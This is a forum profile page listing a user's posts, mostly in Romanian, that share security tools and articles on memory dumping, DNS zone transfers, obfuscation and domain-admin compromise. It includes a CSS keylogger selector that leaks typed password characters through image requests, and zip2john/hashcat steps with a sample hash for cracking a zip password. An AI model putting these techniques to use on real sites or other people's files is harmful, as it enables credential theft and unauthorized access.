Jump to content


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


u0m3 last won the day on July 21

u0m3 had the most liked content!

Community Reputation

280 Excellent


About u0m3

  • Rank
    Registered user
  • Birthday 12/14/1987

Profile Information

  • Gender
  • Location
  • Interests


  • Location

Recent Profile Visitors

3246 profile views
  1. Website: https://buckets.grayhatwarfare.com/ Via:
  2. Synopsis: Process Dump is a Windows reverse-engineering command-line tool to dump malware memory components back to disk for analysis. Often malware files are packed and obfuscated before they are executed in order to avoid AV scanners, however when these files are executed they will often unpack or inject a clean version of the malware code in memory. A common task for malware researchers when analyzing malware is to dump this unpacked code back from memory to disk for scanning with AV products or for analysis with static analysis tools such as IDA. Source: http://split-code.com/processdump.html (side-note: unul dintre cele mai interesante website-uri din punc de vedere al design-ului) GitHub Repository: https://github.com/glmcdona/Process-Dump Via:
  3. Synopsis: The recent DDoS drama with Dyn has had me reading up on Domain Name Systems (DNS). Time and time again, bad guys have proved that one of the best ways to execute a successful Distributed Denial of Service (DDoS) is to hit DNS servers. As a pentester, name servers do come up a lot during assessments, especially during the reconnaissance phases. We still come across a few public name servers allowing zone transfers every now and then, which is always a treat, but I hardly ever look at DNS servers as an actual target. I still haven’t come across a client that’s actually willing to pay anyone to bring their services down. The DDoS against Dyn was particularly troublesome because Dyn is a major DNS provider and the attacks caused serious outages to a number of popular sites; Twitter, Paypal, Reddit, Github, Spotify and more. Which got me thinking; if I was a bad guy doing my recon, looking for the best name servers to hit, how would I go about it? Which name servers would I pick? Querying a domain for the name server(s) it uses is pretty straight forward, but if the name server was my target and a denial of service was my goal, I’d want to find out the opposite; how many domain names are using the target name server? Source: https://thevivi.net/2016/11/17/dnsnitch-reverse-ns-lookups-zone-transfers/ GitHub Repository: https://github.com/V1V1/DNSnitch Bonus: axfr.py - https://github.com/V1V1/axfr.py (script that takes a list of domains as input and attempts zone transfers on all of them against a specified name server)
  4. Synopsis: RedHunt aims to be a one stop shop for all your threat emulation and threat huning needs by integrating attacker's arsenal as well as defender's toolkit to actively identify the threats in your environment. GitHub Repository: https://github.com/redhuntlabs/RedHunt-OS
  5. Synopsis: As an emerging concept, the industry has yet to settle on a definitive definition of adversarial simulation, but it involves simulating [components of] targeted attacks in order to test both an organization’s instrumentation stacks and their ability to respond to the attack via their incident response process. This differs from Red Teaming in that adversarial simulation is typically a cooperative activity between the simulation runners and the simulation recipients with an end goal of validating defensive telemetry and testing incident response plans and playbooks. Raphael Mudge wrote a great blog post on the subject, which I recommend. Source: https://medium.com/uber-security-privacy/uber-security-metta-open-source-a8a49613b4a GitHub Repository: https://github.com/uber-common/metta
  6. Synopsis: Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages. However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules. Whitepaper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html GitHub Repository: https://github.com/danielbohannon/Invoke-DOSfuscation Source:
  7. Asta e troll, nu? Adica sper did tot sufletul ca e troll. Exista atatea sabloane de CV. Nu poti sa trimiti asa ceva cu intentii serioase, nu?
  8. Synopsis: A Scary Thought: I’ve worked in the Cyber Security space performing a wide breadth of penetration and red team services for years. Yes it’s still as easy (if not more so in this day and age!) to obtain Domain Admin “before lunch” as it was when I first started pen-testing. Back in September of 2013, Spider Labs wrote an article titled “Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network” This article is written to compliment and serve as a Part 2 of sorts to the original SpiderLabs Blog post. Link: https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Via:
  9. Sincer, nu prea cred ca multumea cineva cuiva... Vezi ca le dai idei. In alta ordine de idei, cine a preluat (sau a scris/transcris) citatul de pe Maszol.ru (care e de fapt maszol.ro) a dat-o de gard grav, cu traducerea Zici ca e telefonul fara fir. Ce scrie pe http://securityaffairs.co/wordpress/70046/cyber-crime/raiffeisen-cyber-heist.html: Ce scrie pe http://www.maszol.ro/index.php/szajtato/93368-az-evszazad-rablasa-kifosztottak-egy-nagy-bank-romaniai-automatait: Ce ar trebui sa scrie: Sa nu mai aducem in discutie traducerea din Maghiara (presupun) in Engleza.
  10. u0m3

    Cyber Security Challenge Belgium

    Pacat ca pare a fi rezervata studentilor din Belgia.
  11. Python script to decode common encoded PowerShell scripts. Source: https://github.com/JohnLaTwC/PyPowerShellXray
  12. u0m3

    CSS Keylogger

    Ideea de baza este folosirea selectorilor CSS pe baza de valori pentru a face request-uri fictive de background-image, cam asa input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } Sursa: https://github.com/maxchehab/CSS-Keylogging
  13. u0m3

    Inlaturare parola arhiva zip

    In general, daca fisierul tau zip nu se numeste test.zip, e normal sa se planga ca nu il gaseste. Zic si eu.
  14. u0m3

    Inlaturare parola arhiva zip

    Daca este o arhiva zip normala, poti incerca zip2john (program utilitar din suita JohnTheRipper). Cam in felul acesta: zip2john test.zip > test.zip.hash Acum, daca ai noroc, poti folosi hashcat pentru a face partea de brute-force/dictionary-attack/etc folosind OpenCL/CUDA. Daca hash-ul este de forma test.zip:$pkzip2$1*2*2*0*1c*10*f30b8770*0*3e*0*1c*f30b*495b*14f1b9c5523b908446a836c0ee0f109fdf033eb16a8b360d528c3a4c*$/pkzip2$:::::test.zip (adica apare acel $pkzip2$) vei fi nevoit sa te multumesti cu performanta cpu. Cat despre IDA, ai incercat sa ii faci debgging in timp ce ruleaza, sa vezi cam ce si cum face?
  15. Scuzati-mi impertinenta ignoranta, dar de ce?